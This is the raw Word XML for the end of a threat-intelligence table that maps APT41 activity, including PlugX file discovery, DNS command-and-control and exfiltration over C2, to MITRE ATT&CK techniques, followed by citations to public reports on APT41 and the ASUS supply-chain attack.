                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63AE489C" w14:textId="7C6028BB" w:rsidR="00EC7AD0" w:rsidRDefault="002B5C71" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="302470C0" w14:textId="25A0DEBC" w:rsidR="00EC7AD0" w:rsidRDefault="00E237C6" w:rsidP="00E20C37">
            <w:r>
              <w:t xml:space="preserve">[9] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E237C6">
              <w:t>PlugX</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E237C6">
              <w:t xml:space="preserve"> has a module to enumerate drives and find files recursively.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E237C6" w:rsidRPr="00B857D7" w14:paraId="3C03D732" w14:textId="77777777" w:rsidTr="009C377E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4940F99E" w14:textId="52F24E09" w:rsidR="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB4F92A" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00B857D7" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C7B29A" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00D81EFA" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002B5C71">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.004 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002B5C71">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="791B7876" w14:textId="2B1B05E8" w:rsidR="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DE941C0" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00B857D7" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="688C3864" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="665C45C4" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CED708D" w14:textId="5A841B28" w:rsidR="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:r>
              <w:t>Prepare to exfiltrate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E237C6" w:rsidRPr="00E237C6" w14:paraId="565D87D4" w14:textId="77777777" w:rsidTr="009C377E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16D737E8" w14:textId="1B1312E9" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59887621" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6328A854" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29CE7E47" w14:textId="12327291" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71CF2283" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="326BE8B0" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CA6D65" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20D3A425" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] APT41 activity aimed at medical device companies </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="724CDB02" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">and pharmaceuticals is demonstrative of the group's </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="097AC514" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">capacity to collect sensitive and highly valuable </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45E752BA" w14:textId="77777777" w:rsidR="00E237C6" w:rsidRPr="00E237C6" w:rsidRDefault="00E237C6" w:rsidP="009C377E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E237C6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>intellectual property (IP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="96"/>
      <w:tr w:rsidR="00EC7AD0" w:rsidRPr="00B857D7" w14:paraId="16BC607C" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F6D0848" w14:textId="77777777" w:rsidR="00EC7AD0" w:rsidRDefault="00EC7AD0" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24E39789" w14:textId="77777777" w:rsidR="00EC7AD0" w:rsidRPr="00B857D7" w:rsidRDefault="00EC7AD0" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A393364" w14:textId="77777777" w:rsidR="00EC7AD0" w:rsidRPr="00D81EFA" w:rsidRDefault="00EC7AD0" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F756E41" w14:textId="77777777" w:rsidR="00EC7AD0" w:rsidRDefault="00EC7AD0" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27136ECF" w14:textId="77777777" w:rsidR="00EC7AD0" w:rsidRPr="00B857D7" w:rsidRDefault="00EC7AD0" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F8EC1B5" w14:textId="77777777" w:rsidR="00EC7AD0" w:rsidRDefault="00EC7AD0" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12AA13AC" w14:textId="77777777" w:rsidR="00EC7AD0" w:rsidRDefault="00EC7AD0" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21C17BF0" w14:textId="77777777" w:rsidR="00EC7AD0" w:rsidRDefault="00EC7AD0" w:rsidP="00E20C37"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00ED5880" w14:paraId="2450060B" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673554E9" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00F808AD" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04074DE2" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00F808AD" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27438569" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00F808AD" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6461CA5C" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00F808AD" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="169D14A0" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00F808AD" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="232CF281" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00F808AD" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E5FF112" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00F808AD" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11AFE77B" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00F808AD" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D049BDB" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="0077286F" w:rsidRDefault="00D77A9F" w:rsidP="00D77A9F"/>
    <w:p w14:paraId="24DBDB74" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00D77A9F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId115" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>[Report] Double Dragon: APT41, a Dual Espionage and Cyber Crime Operation (fireeye.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A6AAC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217EC224" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00D77A9F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId116" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Justice Department charges five Chinese members of APT41 over cyberattacks on US companies | TechCrunch</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2020] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( via</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Google Search “APT41 Asus Attack”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EAA01E" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00D77A9F">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId117" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Hackers dropped a secret backdoor in </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Asus’</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> update software | TechCrunch</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2019] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( via</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [2])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420D6BDA" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00D77A9F">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId118" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ASUS Software Updates Used for Supply Chain Attacks | Symantec Enterprise Blogs (security.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2019] (via Google Search “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t>asus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t>suppply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t xml:space="preserve"> chain attack</w:t>
      </w:r>
      <w:r>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
